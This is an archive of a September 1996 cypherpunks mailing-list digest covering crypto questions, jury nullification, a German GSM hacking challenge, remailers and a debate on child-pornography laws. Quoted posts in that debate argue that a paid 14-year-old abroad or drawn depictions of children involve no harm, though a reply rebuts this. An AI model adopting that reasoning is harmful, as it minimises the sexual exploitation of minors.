From WlkngOwl at unix.asb.com Wed Sep 11 02:51:24 1996 From: WlkngOwl at unix.asb.com (Deranged Mutant) Date: Wed, 11 Sep 1996 17:51:24 +0800 Subject: (Fnord) Edupage, 10 September 1996 Message-ID: <199609110733.DAA04996@unix.asb.com> Chances are this already made it to the list... ------- Forwarded Message Follows ------- ************************************************************ Edupage, 10 September 1996. Edupage, a summary of news about information technology, is provided three times a week as a service by Educom, a Washington, D.C.-based consortium of leading colleges and universities seeking to transform education through the use of information technology. ************************************************************ TOP STORIES Wired World Will "Diminish National Sovereignty" [..] WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" A leading Clinton Administration official on information security and cryptography matters says that traditional notions of sovereignty, national security and warfare will be undermined by the year 2020, when the whole world is "wired" and e-cash is the norm. The result will be less powerful governments in relation to criminal organizations such as the Mafia and international drug cartels, says Michael Nelson, who adds that organized crime members are already some of the most sophisticated users of computer systems and strong encryption technology. In addition, computer crackers will pose a more significant threat. In response, Nelson advocates resolving the issue of whether unauthorized access of a computer is an "act of trespass" or an "act of war," and prosecuting the intrusions accordingly. (BNA Daily Report for Executives 6 Sep 96 A14) [..] From scrappo.reverb at juno.com Wed Sep 11 03:29:28 1996 From: scrappo.reverb at juno.com (A L) Date: Wed, 11 Sep 1996 18:29:28 +0800 Subject: No Subject Message-ID: <19960910.225608.8159.0.scrappo.reverb@juno.com> I apologize for any behavior on behalf of my domain name. 
(A little background:) I am a cryptographer hopeful. I was interested in such things as the Caesar Cypher and the Enigma machine and the Roman encryption "padlock" when other kids were more interested in how the water fountain shot water straight up. After some thought and a little writing, I developed an encryption program using Mallard Basic on an old Amstrad (which I still grudgingly keep) with programming skills I taught myself. I know most of the basics regarding RSA, PGP, and assorted single pass (?) cyphers. One thing I do not understand has to do with how RSA sieves large primes, etc. That is one of the few things that I do not understand about RSA. Another aspect of RSA I do not understand is the usage of primes (or any number) in the actual encryption process. Does the program add numbers from the key to the plaintext to create the cyphertext, or does it use some other process. I am sorry if any of these questions seem redundant and/or stupid, but at this point in time, I can't get my hands on any actual explanation for how it works. (I would get a copy of "Applied Cryptography," but I do not have any source of income, which also explains Juno.) Aiieee!!! the dreaded "J" word! Once again, I apologize if any of this caused annoyance or sickness. From wfrench at interport.net Wed Sep 11 04:14:21 1996 From: wfrench at interport.net (Will French) Date: Wed, 11 Sep 1996 19:14:21 +0800 Subject: Please don't killfile juno.com Message-ID: <199609110846.EAA22788@interport.net> Looks to me like there's at least one person at Juno who's interested in serious crypto. This message just appeared on the list, but I'm forwarding it in case anyone's actually killfiled the site. ---begin forward--- > I apologize for any behavior on behalf of my domain name. > (A little background:) > I am a cryptographer hopeful. 
I was interested in such things > as the Caesar Cypher and the Enigma machine and the Roman > encryption "padlock" when other kids were more interested in > how the water fountain shot water straight up. After some > thought and a little writing, I developed an encryption > program using Mallard Basic on an old Amstrad (which I still > grudgingly keep) with programming skills I taught myself. > I know most of the basics regarding RSA, PGP, and assorted > single pass (?) cyphers. One thing I do not understand has to > do with how RSA sieves large primes, etc. That is one of the > few things that I do not understand about RSA. Another aspect > of RSA I do not understand is the usage of primes (or any > number) in the actual encryption process. Does the program add > numbers from the key to the plaintext to create the > cyphertext, or does it use some other process. > I am sorry if any of these questions seem redundant and/or > stupid, but at this point in time, I can't get my hands on any > actual explanation for how it works. (I would get a copy of > "Applied Cryptography," but I do not have any source of > income, which also explains Juno.) Aiieee!!! the dreaded "J" > word! > Once again, I apologize if any of this caused annoyance or > sickness. From gary at systemics.com Wed Sep 11 04:40:23 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 11 Sep 1996 19:40:23 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <2.2.32.19960910190024.007245e4@pop.ricochet.net> Message-ID: <32367F80.41C67EA6@systemics.com> Greg Broiles wrote: > > At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: > > >If govt. protects its "sources and methods", however nefarious, to the > >extent that the public is never asked to assent to these methods (even > >though a few of us know about them anyway), then the public doesn't have > >to become overtly cynical about what's going on. 
> > But the public *is* asked to assent to those methods - your chance to vote > on them is known colloquially as "jury duty". Ah, but isn't "jury selection" the process of selecting those that don't know they are judging the law as well as the case? Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From proff at suburbia.net Wed Sep 11 05:26:04 1996 From: proff at suburbia.net (Julian Assange) Date: Wed, 11 Sep 1996 20:26:04 +0800 Subject: LACC: Bernie S. attacked in prison In-Reply-To: <199609101648.MAA06069@astro.ocis.temple.edu> Message-ID: <199609110936.TAA15567@suburbia.net> > >Of course. Surprising or shocking? Not in the least. > > > > Nico Garcia > > raoul at tiac.net > > Every day that I wake up, I'm amazed at how far this country has > devolved. When rational people sit quietly and accept the abuses of the > police and other authorities, it is a sign that society has truly turned > belly-up. I was shocked. I've had some dealings with the SS. Their behavior in court, painting Ed as a "terrorist" was to be expected, NOT condoned. What happened to Ed in prison is shocking. If Ed was a killer of little children, then I could understand. He wasn't. At his worst Ed's crime was no more than petty white collar fraud. Ed would not have been imprisoned in Australia. I've reviewed many US computer crime / toll fraud cases, including sentencing decisions. I found myself very unimpressed with US sentencing guidelines, which are extremely rigid and compartmentalised, leaving a sentencing judge with almost no discretion or ability to impose a sentence that fits the crime as a whole or the defendant as a whole. Whether Nico or anyone else found the violence against Cummings "shocking" or "to be expected" or not, is of no import.
No one is surprised to hear that a pretty girl walking alone through central park in the middle of the night has been brutally raped. This makes the crime, and its effects on the victim no less hideous. Those that abuse their power and inflict grave violence on others must be held accountable and their crimes deplored and punished in the strongest manner. Failure to do so merely creates an environment where such behavior becomes predominant. This is not acceptable. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies. The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for our own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From schmidt at pin.de Wed Sep 11 05:33:22 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Wed, 11 Sep 1996 20:33:22 +0800 Subject: Digital rights organisation Message-ID: Hi, thinking about what happened in Germany, are there any 'digital rights' organisations in Germany ? If not, we would like to found one. Are there any international orgs (EFF?,...) who can help us ? What goals do they have ? To Germans: How do I found an e.V. in Germany ? Thanks for the help in advance, -stephan From liberty at gate.net Wed Sep 11 07:50:07 1996 From: liberty at gate.net (Jim Ray) Date: Wed, 11 Sep 1996 22:50:07 +0800 Subject: TWA 800 - Serious thread.
Message-ID: <199609111143.HAA42252@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: gary at systemics.com, cypherpunks at toad.com Date: Wed Sep 11 07:41:52 1996 Gary wrote: <...> > Ah, but isn't "jury selection" the process of selecting those that > don't > know they are judging the law as well as the case? But Gary, don't you see that's good? We need to get laws *back* against witches, against fugitive slaves, against forming unions, against drinking alcohol, etc. and truth certainly shouldn't be an absolute defense against libel! "Our" country is slowly lapsing into anarchy, and would likely go even further if we didn't have the moral Exons, Packwoods, Clintons, and Rostenkowskis to lead us and protect us! [For those who don't know me, I'm being sarcastic.] JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ From schmidt at pin.de Wed Sep 11 08:50:30 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Wed, 11 Sep 1996 23:50:30 +0800 Subject: Hacking Mobil Telephone System ?
Message-ID: Allgaeuer Zeitung, 9.9.96 says: (A German newspaper) The German Company MobilCom wants to prove that the German GSM networks D1,D2 and E+ are secure. There have been rumors that it's possible to phone with a hacked code. If a hacker is able to phone using the number 0171 / 3 28 99 66 in Germany with a hacked code, the company will pay 100.000 DM (~65.000$) to a non profit organisation of the hacker's choice. Is someone able to do this ? :) (No responsibility taken for the translation.) -stephan From pgruber at nz1.netzone.com Wed Sep 11 08:50:49 1996 From: pgruber at nz1.netzone.com (pgruber at nz1.netzone.com) Date: Wed, 11 Sep 1996 23:50:49 +0800 Subject: Factory Memory Message-ID: <199609102056.NAA28544@goodguy.goodnet.com> Factory memory update... As you know, the new software applications are very memory hungry. As a direct source for memory products we can make your memory upgrade affordable. These are the latest prices for popular memory 72 pin SIMM memory boards: 4MB $19.99 US 8MB $39.99 US 16MB $89.99 US 32MB $219.00 US Many more styles and sizes are available on our website - www.gruber.com, or call us at (602) 863-2655 or fax at (602) 257-4313 We also offer a toll-free number at 800 658-5883 (USA only). Thank you, Pete Pete Gruber pgruber at netzone.com (602) 863-2655 Voice (602) 257-4313 Fax From hevnsnt at ksu.edu Wed Sep 11 09:00:54 1996 From: hevnsnt at ksu.edu (Y Do U Care) Date: Thu, 12 Sep 1996 00:00:54 +0800 Subject: hackerlist In-Reply-To: <199609011450.AAA22573@suburbia.net> Message-ID: On Mon, 2 Sep 1996, Julian Assange wrote: > > I am planning to make a list of hackers and would appreciate it if you > > would e-mail me with the following information. > > handle > > e-mail > > city,state > > url > > whether or not you would like to receive the list when finished > > thanks for your help > > P. Cummings > > Patrickbc at juno.com > > Are you on this list of morons?
I can hardly wait for the big rush of everyone sending in their names on this one.. haha buddy... I wouldn't wait up. -HevnScenT From liberty at gate.net Wed Sep 11 09:52:24 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 12 Sep 1996 00:52:24 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609111336.JAA92112@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: m5 at tivoli.com, cypherpunks at toad.com Date: Wed Sep 11 09:35:17 1996 Mike M Nally wrote: > Declan McCullagh wrote: > > Under the Knox decision, yes. (Dancing girls in leotards are verboten.) > > Is this going to have some implications for broadcast of the women's > gymnastic events in the next Olympics? Presumably, that depends on how/where/why the cameraman zooms in, if I am reading the case (and/or the judges' minds) right. [OK, I'll shut up now.] JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president.
http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ From afabbro at umich.edu Wed Sep 11 10:55:33 1996 From: afabbro at umich.edu (Andrew Fabbro) Date: Thu, 12 Sep 1996 01:55:33 +0800 Subject: number theory paper resource Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 10 Sep 1996, A L wrote: > I know most of the basics regarding RSA, PGP, and > assorted single pass (?) cyphers. One thing I do not > understand has to do with how RSA sieves large primes, As recently mentioned in sci.crypt...there's an interesting page with papers on number theory & cryptology at: http://www.ph.tn.tudelft.nl/~visser (~visser/crypto.html is the exact page you probably want) Andrew Fabbro [afabbro at umich.edu] http://www-personal.umich.edu/~afabbro/ PGP mail preferred; finger afabbro at us.itd.umich.edu for key "A good marketing organization listens to its customers...WE HEAR YOU!" - the National Security Agency From grafolog at netcom.com Wed Sep 11 11:26:50 1996 From: grafolog at netcom.com (jonathon) Date: Thu, 12 Sep 1996 02:26:50 +0800 Subject: TWA 800 - Serious thread.
In-Reply-To: <32367F80.41C67EA6@systemics.com> Message-ID: On Wed, 11 Sep 1996, Gary Howland wrote: > > But the public *is* asked to assent to those methods - your chance to vote > > on them is known colloquially as "jury duty". But judges have said that Jury Nullification is not acceptable legal practice. > Ah, but isn't "jury selection" the process of selecting those that don't > know they are judging the law as well as the case? You forgot something else. Jury Selection also involves the removal from the jury any individual who might have some knowledge about anything which might be relevant to the case. So the only people on juries are those who are unemployed, or uneducated or usually both. That they are easily manipulated is a further virtue, from the POV of the Injustice system the US has. xan jonathon grafolog at netcom.com The one who does nothing can win over the one who rushes around to all the things. The one who is gentle can win over the one who is strong. From attila at primenet.com Wed Sep 11 11:39:48 1996 From: attila at primenet.com (attila) Date: Thu, 12 Sep 1996 02:39:48 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: <199609111509.JAA14414@InfoWest.COM> Ah, but Dr. Dimitri, * I * did place you in my "drop" filter long enough ago that I even forget why --and I have seen no reason to change that decision from the various postings in your hand which have been made part of another's reply. --attila -- Politicians are like diapers. They both need changing regularly, and for the same reason. --- original message follows --- In , on 09/10/96 at 10:52 PM, tcmay at got.net (Timothy C. May) said: = At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote: = > tcmay at got.net (Timothy C. May) writes: = > > I didn't call for your "expulsion." No one has been expelled in = > > four years of the list's existence.
= > = > However Tim has been complaining about my postings to = > various people I know and respect. (I stopped respecting = > Tim years ago.) = And who might these people be? I suggest you name them, as = I have not even mentioned your name to anyone. You don't = rate a complaint from me. =--TCM From dlv at bwalk.dm.com Wed Sep 11 11:48:06 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 12 Sep 1996 02:48:06 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: <7qi4TD1w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote: > >tcmay at got.net (Timothy C. May) writes: > >> I didn't call for your "expulsion." No one has been expelled in four years > >> of the list's existence. > > > >However Tim has been complaining about my postings to various people I know > >and respect. (I stopped respecting Tim years ago.) > > And who might these people be? I suggest you name them, as I have not even > mentioned your name to anyone. You don't rate a complaint from me. E.g. Kelly Goen is one of the people who told me that Tim May's been complaining about my alleged "spit" posts. Note that Kelly's not on this mailing list (unlike at least two other people who said to me that Tim complained to them off-list) and that most of the posts Tim complains about are obvious forgeries. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From roger at coelacanth.com Wed Sep 11 11:56:26 1996 From: roger at coelacanth.com (Roger Williams) Date: Thu, 12 Sep 1996 02:56:26 +0800 Subject: (Fnord) Edupage, 10 September 1996 In-Reply-To: <199609110733.DAA04996@unix.asb.com> Message-ID: > WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" > [...] Yes; and what was the problem, again? ... 
-- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From maldrich at grci.com Wed Sep 11 11:59:50 1996 From: maldrich at grci.com (Mark O. Aldrich) Date: Thu, 12 Sep 1996 02:59:50 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: On Wed, 11 Sep 1996, Stephan Schmidt wrote: > The German Company MobilCom wants to prove > that the German GSM networks D1,D2 and E+ are > secure. > > > If a hacker is able to phone using the number > 0171 / 3 28 99 66 in Germany with a hacked code, > the company will pay 100.000 DM (~65.000$) to a non > profit organisation of the hacker's choice. > > Is someone able to do this ? :) While there's dubious wisdom in trying to tell Der Polizei, "I was just responding to an authorization that I found on the Internet that says it's OK to phreak your phones - honest," I'd also expect to get paid a hell of a lot more than $65 for doing a penetration test on their network. Sixty five bucks won't even pay the per diem, none the less a reasonable wage. And Der Polizei is *NOT* known for having a sense of humor about anything, at any time, with anyone. Remember, kids, they may look like shit in uniform, but those automatic weapons they carry are real, so's the ammo, and they know how to use both of 'em. And *I'll* decide if and when I want to give it to charity, just like I do with the rest of my salary, thank you.... ------------------------------------------------------------------------- |And if Dole wins and dies in office, they| Mark Aldrich | |could just pickle him and no one would | GRCI INFOSEC Engineering | |notice. It wouldn't be the first time we| maldrich at grci.com | |had a dill-dole running the country.
| MAldrich at dockmaster.ncsc.mil| | -- Alan Olsen | | |_______________________________________________________________________| |The author is PGP Empowered. Public key at: finger maldrich at grci.com | | The opinions expressed herein are strictly those of the author | | and my employer gets no credit for them whatsoever. | ------------------------------------------------------------------------- From m5 at tivoli.com Wed Sep 11 12:02:37 1996 From: m5 at tivoli.com (Mike McNally) Date: Thu, 12 Sep 1996 03:02:37 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: Message-ID: <3236A627.510F@tivoli.com> Declan McCullagh wrote: > > Q: Is a collage of images of little girls (or boys, one presumes) in > > swimsuits, with apparent salacious intent, illegal? > > Under the Knox decision, yes. (Dancing girls in leotards are verboten.) Is this going to have some implications for broadcast of the women's gymnastic events in the next Olympics? ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From whgiii at amaranth.com Wed Sep 11 12:06:00 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 12 Sep 1996 03:06:00 +0800 Subject: [RANT]Education: Was Re: TWA 800 - Serious thread. In-Reply-To: <32367F80.41C67EA6@systemics.com> Message-ID: <199609111444.JAA13035@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <32367F80.41C67EA6 at systemics.com>, on 09/11/96 at 10:59 AM, Gary Howland said: >Greg Broiles wrote: >> >> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: >> >> >If govt. protects its "sources and methods", however nefarious, to the >> >extent that the public is never asked to assent to these methods (even >> >though a few of us know about them anyway), then the public doesn't have >> >to become overtly cynical about what's going on. 
>> >> But the public *is* asked to assent to those methods - your chance to vote >> on them is known colloquially as "jury duty". >Ah, but isn't "jury selection" the process of selecting those that don't >know they are judging the law as well as the case? The form of Government that our Founding Fathers created here in the US was based on the principle that the citizens were educated, informed, God fearing people with solid moral principles. We no longer have such a society if we ever did. Our citizens are for the most part uneducated, ill-informed, with the moral fiber that back in 1776 would have found the whole lot of them in stocks in the town square. The two major causes of this have been public education & TV. Now before I get flamed here let me explain my position. :) Over the past 40-50 yrs. public education has been going down hill. To receive the education that was once received from 12 yrs of school now requires 16 yrs. We are graduating greater and greater numbers of students that do not have the basic skills to survive in the workplace. There is little or no instruction on government, law, or the Constitution in school. The majority of citizens are ignorant of the law, of the Constitution (both State & Federal), of their local government. In case you doubt this go out and ask some of your fellow citizens who is on their town council, county boards, state representatives. Ask them how local judges are selected. Who are their local judges and what are their positions on key political issues. Now on moral fiber & God fearing: Every society has recognized that there were some basic rules its citizens had to live by in order for them to survive. Now there can be some debate over individual rules or how they should be enforced but all societies have agreed that there were rules that the group as a whole had to live by. The three major ones: Don't Kill Don't Steal Don't Lie A majority of our current laws come from these 3 basic principles.
Unfortunately our children are not being taught this. They are not being taught this by their parents, they are not being taught this by the schools, and the majority of airtime on TV is teaching them just the opposite. - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - Warpserver SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- MR/2 Tag->Get OS/2 - the best Windows tip around! From chuck at nova1.net Wed Sep 11 12:44:15 1996 From: chuck at nova1.net (Chuck Thompson) Date: Thu, 12 Sep 1996 03:44:15 +0800 Subject: Child porn as thoughtcrime Message-ID: <1.5.4.32.19960911145102.0069fb04@mail.nova-net.net> The answer to the all the questions in the first set is yes, in this country anyway, if they are interpreted by the legal system as intending to incite illicit sexual acts, fantasies or obsessions about children. The fantasies or obsessions are assumed to lead to the illegal acts. >Whom is exploiting whom? Well, I'd say that anyone who benefits materially from the distribution of child porn is exploiting either the children, the pervert or both. >Which acts are crimes? Most of them, in this country. A few would be open to interpretation by the courts.
>I submit that the various child porn laws we have in the United States are about the >clearest examples of "thoughtcrime" one can find, where the _thought_ is what is being >criminalized. I agree that it is an excellent example for your proposition regarding thoughtcrime. I disagree that the thought is what is illegal, consequently the subject doesn't work as the basis for your argument. *Thinking* about committing a crime is not illegal, *acting* on your thought may be. Exp: I can think/ponder about killing my enemy. Until I do something about my thoughts, I'm not guilty of a crime. If I begin to discuss the commission of a crime with you, and it could be proven that the discussion was actually a part of the planning to commit such a crime, then, at the very least, we are guilty of conspiracy to commit a crime. Intent to commit an actual crime must be proven. >-- consumption of child porn creates a market >-- it harms the children >-- it's disgusting >-- etc. >Clearly the first argument applies to many other things. Why not outlaw pro-drug speech? Hold on here.. you are making an invalid comparison. To my knowledge, there is no law against speaking in favor of child porn, any more than there is against speaking in favor of drug usage. It is against the law to *use* either of them. >The second argument, that children are actually harmed, is vitiated by the fact that >much so-called child porn comes from countries where the actors are of legal age. >How can a 14-year-old Thai girl be "harmed" when what she is being paid to do is >perfectly legal in Thailand? There you go again.. being legal does not, in any way, mitigate its harmfulness. There may be places on this earth where it is legal to convince a two-year-old to perform some sexually gratifying act by giving her a piece of candy. Just because it is legal doesn't mean it won't scar the child. The effect on the child is what is illegal, in this case.
>And the case of morphings, drawings, stories, etc., clearly involve no actual children, >so the argument that children are harmed is empty. The argument is not dependent upon whether or not actual children are used, any more than whether or not an actual gun is used in a robbery - the net effect is the same. Children are harmed by the promotion of child porn because it leads to the abuse/exploitation of kids. >As to me argument that images, stories, etc., are disgusting, amoral, inappropriate, >etc., well, perhaps. But what is the legal and constitutional basis for restricting >such things? Many opinions and actions are vile and disgusting, but are not illegal. >Under what interpretation of the Constitution is the creation of a drawing depicting, >say, a 7-year-old girl having sex with someone or something a criminal act? The >obscenity laws? First, you must separate opinions from actions. In this country, opinions are not ever illegal. Some actions are. The illegality is probably (I'm out of my depth here, not being a lawyer or student of the constitution) based on various laws which would fall under the umbrella of "obscenity". We, as a society, have the right to formulate, pass and enact legislation which we deem to be in our best interests. And, as long as the laws which are passed do not violate our constitution, the underlying basis for passing such laws, the fact that an individual may not agree with the law does not give that individual the right to violate it without consequence. In other words, an individual may be able to violate a law without consequence, if he can prove that the law is unconstitutional. >My point is this: For anyone who claims that "thoughtcrime" is something the Evil >Empire specialized in, i.e., totalitarian communist regimes, look to the enforcement of >laws about what can be viewed or accessed from the United States. Thoughtcrime. 
Your case is weak, because it is based on the false premise that the illegality of child pornography equates to illegality of thought. It is overt action which is illegal, not thought. Let those who believe that they have a constitutional right to "keep and bear child pornography" violate the various laws and see if they can prove that their constitutional rights are violated by the law which proscribes such things.

By the way, Tim, I found your "translation" to be offensive, crude and deliberately provocative. I do, however, support your right to publish it. Generally speaking, I find your missives to be enlightening and appreciate the way they cause me to think carefully about my position on various topics.

Regards,
Chuck Thompson

From nobody at cypherpunks.ca Wed Sep 11 12:56:20 1996
From: nobody at cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 12 Sep 1996 03:56:20 +0800
Subject: 'robert' and his 'hipcrime' web site
Message-ID: <199609111609.JAA25770@abraham.cs.berkeley.edu>

Have you considered who is funding this "hipcrime" site? Web sites aren't terribly expensive these days, but someone paid at least a few hundred dollars in set-up fees for this.

Now, I realize that most artists really just like to draw, and will spend money on their art projects without expecting any kind of benefit; that is not unusual. What is unusual is the disclaimer and its corporate mentality, and the "anarchist info".

It's obvious that this guy's true passion is fractals and raytracing. He threw in some bomb-making stuff, but he scanned it out of a book and probably never tried it. Compared to the rest of the site, it looks like an afterthought. Someone who was really interested in chemistry would have taken the time to retype the info and add their own comments. He had a reason to have some "anarchist" info on there but he's not really interested in it. So basically this guy is a mathematician/artist trying to pretend he's an anarchist.

Same goes for the remailers.
He claims he likes remailers and anonymity, but he's lying. Anyone who really liked remailers/anonymity/privacy would have pages and pages about how to use remailers, and why privacy is a good thing. He has a reason he needs to be anonymous, but it's not because he supports privacy. He publishes a PGP key, because he wants to pretend he's an anarchist, and Louis Freeh told him that all evil terrorist organizations use PGP. But he doesn't like PGP, he doesn't advocate PGP, and he doesn't tell you where to get PGP. So we have a guy, probably with an education in mathematics, who likes abstract art. Not what would generally be considered a political figure. But there's something else there - something that doesn't want to be seen, something that is very strongly law&order, something that doesn't understand the anarchy of the net, and fears it. Something that has the money to fund lots of little pet projects. Is robert at precipice.v-site.net just a useful idiot who found someone who will fund his fractal creations? Or is he a willing participant? I guess it doesn't matter really. Someone here doesn't like us... didn't like us before Hipcrime went online, and still doesn't like us. But now at least he's got our attention. From frantz at netcom.com Wed Sep 11 13:25:50 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 04:25:50 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: <199609111653.JAA03530@netcom8.netcom.com> At 7:26 PM 9/10/96 -0700, Lance Cottrell wrote: >It is a good idea, but it does involve another whole level of >infrastructure. I am not at all sure that message pools are not a better >system. Your suggestion requires The client to do a lot of work, and for >the remailers to store many keys for indefinite periods. You certainly know the details of Mixmaster remailers better than I do. 
In a last defense, while the protocol requires Alice's program to do a lot of work, it still could be fairly easy for Alice herself to use. In addition, the remailer could set a definite limit to the lifetime of the keys, since Alice is also setting such a limit. If Alice specifies their lifetime when she sends them, then the path would automatically dissolve without action on her part.

Let me float one more hare-brained idea. I think Tim May is right in saying that the most secure response technique is the one in Blacknet. i.e. The responses are posted to some public bulletin board, and then Alice reads them at her leisure. I see two problems with this approach: (1) It doesn't scale well, and (2) Alice's reading of the response may be detected. (I think of the vans in Great Britain which listen to the local oscillator frequency of TV sets to find what people are watching.)

Perhaps both of these problems could be solved by something like a stock photo service which uses digital watermarks to discourage copyright infringement. Since it is using digital watermarks, each copy of a particular photo would be different, providing the opportunity to stego an encrypted message in the photo. If Alice regularly spent $.05 of Ecash for a new desktop background photo, it would be hard to determine which had stegoed messages. The service might even make money on just the above-board sales.

-------------------------------------------------------------------------
Bill Frantz          | "Lone Star" - My personal | Periwinkle -- Consulting
(408)356-8506        | choice for best movie of  | 16345 Englewood Ave.
frantz at netcom.com | 1996                      | Los Gatos, CA 95032, USA

From cmefford at avwashington.com Wed Sep 11 13:39:00 1996
From: cmefford at avwashington.com (Chip Mefford)
Date: Thu, 12 Sep 1996 04:39:00 +0800
Subject: Child Porn and Thought Crime
Message-ID:

If it is a crime to possess photographic child pornography, and this crime is tested in court, then is it a crime for a sightless person to possess photographic child pornography?

If so, then this matter needs to be thought out some more.

If no (by test of court, paper is more or less meaningless) then it is thought crime.

From hallam at ai.mit.edu Wed Sep 11 13:42:30 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Thu, 12 Sep 1996 04:42:30 +0800
Subject: Child Porn as Thoughtcrime
In-Reply-To: <515ldn$gfp@life.ai.mit.edu>
Message-ID: <3236F103.6201@ai.mit.edu>

Declan McCullagh wrote:

> Not so, says Bruce Taylor, the chief architect of the CDA and a
> professional cyber-scaremonger. The former Federal porn-prosecutor
> believes that "not all censorship is bad."
>
> "Foreign countries have an obligation to restrict obscenity and child
> pornography on the Internet by the treaty of 1911," says Taylor. "It's
> an agreement between the states to cooperate and to use international
> laws to prosecute obscenity." And to Taylor, books and copies of
> Penthouse magazine can be obscene.

The status of such treaties governing internal policies is very suspect. In the first place a great many of the countries that signed the original treaty will not exist. Technically neither Germany nor France exist in that form since both have been reformed under entirely new constitutions. In addition it is always open to a sovereign nation to abrogate a treaty. This may entail sanctions but unless the UN were involved it would be unlikely in the extreme that any significant effect would be caused. At this stage a UN resolution would seem more relevant than a treaty from 1911 intended to entrench Victorian morality.
As a European I note that the US happily gives itself the "right" to unilaterally withdraw from treaties of far more significance such as SALT-II or GATT on entirely spurious grounds. The US has also withdrawn from the World court after being found guilty of terrorist acts in Nicaragua.

As such the likes of Bruce Taylor don't exactly have a strong case. If the US thinks it can pick and choose amongst its international obligations then other countries are likely to consider they have equal rights to do so.

I don't think that kiddie porn is likely to be the breaking factor however. Anyone who has been following the European news will understand that recent events in Belgium make that exceptionally unlikely.

I think it most unlikely that any President would be foolish enough to send Mr Taylor over to explain US demands. He is transparently disingenuous and conveniently ill-informed. The small town American parochialism he represents is even less popular in Europe than in California or amongst East coast intellectuals.

Where I see a more likely breaking point is over cannabis which many countries are finding disproportionately expensive to control. Since the US is rapidly becoming the world's largest supplier demands from that quarter may be treated with less than full concern. Spain and the Netherlands have both reformed their drug laws and the UK may well end up doing so in the long term, reform of the prostitution laws will probably come first however.

Phill

From jk at stallion.ee Wed Sep 11 13:45:31 1996
From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=)
Date: Thu, 12 Sep 1996 04:45:31 +0800
Subject: Hacking Mobil Telephone System ?
In-Reply-To:
Message-ID:

Wed, 11 Sep 1996, Mark O. Aldrich wrote:

> On Wed, 11 Sep 1996, Stephan Schmidt wrote:
>
> > the company will pay 100.000 DM (~65.000$) to a non
>
> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network.
Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.

